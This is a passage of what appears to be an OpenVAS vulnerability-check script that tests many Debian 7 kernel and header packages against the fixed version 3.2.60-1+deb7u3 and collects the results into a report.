isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.60-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", 